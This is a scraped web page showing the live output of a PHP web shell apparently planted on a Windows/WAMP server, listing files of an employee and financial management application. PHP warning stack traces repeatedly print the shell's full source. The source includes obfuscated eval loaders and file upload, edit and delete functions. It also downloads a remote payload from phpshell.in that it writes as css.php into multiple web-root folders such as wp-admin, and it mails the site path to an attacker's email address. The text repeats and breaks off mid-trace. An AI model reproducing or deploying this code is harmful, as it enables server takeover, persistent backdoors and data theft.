0byt3m1n1

Path: C:/$Recycle.Bin/S-1-5-21-3082578556-3561887813-2270917969-500/$RHOVKX8/
[ Home ]

Name
Size
Permissions
Last Update
Options
[D] ACCOUNTS
--
drwxrwxrwx
04-Mar-2025 11:48
[D] ADMIN
--
drwxrwxrwx
04-Mar-2025 13:17
[D] ED
--
drwxrwxrwx
04-Mar-2025 15:33
[D] Proposels
--
drwxrwxrwx
01-Jun-2025 01:14
[D] SO
--
drwxrwxrwx
04-Mar-2025 15:22
[D] USER
--
drwxrwxrwx
04-Mar-2025 11:47
[D] ajax
--
drwxrwxrwx
04-Mar-2025 14:12
[D] assets
--
drwxrwxrwx
04-Mar-2025 10:21
[D] gentelella-1.3.0
--
drwxrwxrwx
04-Mar-2025 07:11
[D] images
--
drwxrwxrwx
04-Mar-2025 15:32
[D] inc
--
drwxrwxrwx
31-May-2025 23:18
[D] include
--
drwxrwxrwx
04-Mar-2025 10:44
[D] lib
--
drwxrwxrwx
04-Mar-2025 12:36
[D] model
--
drwxrwxrwx
01-Jun-2025 01:12
[D] photo
--
drwxrwxrwx
04-Mar-2025 13:06
[D] theme_login
--
drwxrwxrwx
04-Mar-2025 11:14
[F] aaindex.php
2.674 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] addemployee.php
11.025 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] addemployee_ctrl.php
4.974 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] common_model.php
1.213 KB
-rw-rw-rw-
21-Dec-2016 15:35
[F] cpms_8.12.11.sql
88.142 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] cpms_db.sql
43.491 KB
-rw-rw-rw-
20-Apr-2017 11:17
[F] database.txt
44.549 KB
-rw-rw-rw-
23-Apr-2017 14:11
[F] defaultValues_mdl.php
7.353 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] employee_mdl.php
3.099 KB
-rw-rw-rw-
07-Aug-2023 11:01
[F] filecheck_mdl.php
0.448 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] financial_mdl.php
8.199 KB
-rw-rw-rw-
16-Dec-2016 16:00
[F] index.php
4.578 KB
-rw-rw-rw-
07-Aug-2023 10:13
[F] index1.php
0.788 KB
-rw-rw-rw-
16-Dec-2016 16:01
[F] index_2.php
2.631 KB
-rw-rw-rw-
05-Apr-2017 09:23
[F] index_old.php
2.048 KB
-rw-rw-rw-
16-Dec-2016 16:01
[F] login_ctrl.php
3.146 KB
-rw-rw-rw-
07-Aug-2023 10:17
[F] logincheck.php
1.158 KB
-rw-rw-rw-
07-Aug-2023 10:26
[F] logout_ctrl.php
0.838 KB
-rw-rw-rw-
21-Dec-2016 15:40
[F] sql.txt
0.063 KB
-rw-rw-rw-
16-Dec-2016 16:01
[F] style.css
22.356 KB
-rw-rw-rw-
16-Dec-2016 16:01
[F] uploader_mdl.php
7.523 KB
-rw-rw-rw-
16-Dec-2016 16:01

© 2017 - ZeroByte.ID.


( ! ) Warning: fopen(C:/wamp64/www/js/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 95
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0613528616fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:95
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 96
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0699541016fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:96
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 97
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0743541016fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:97 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/modules/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 105
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0953541016fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:105
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 106
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
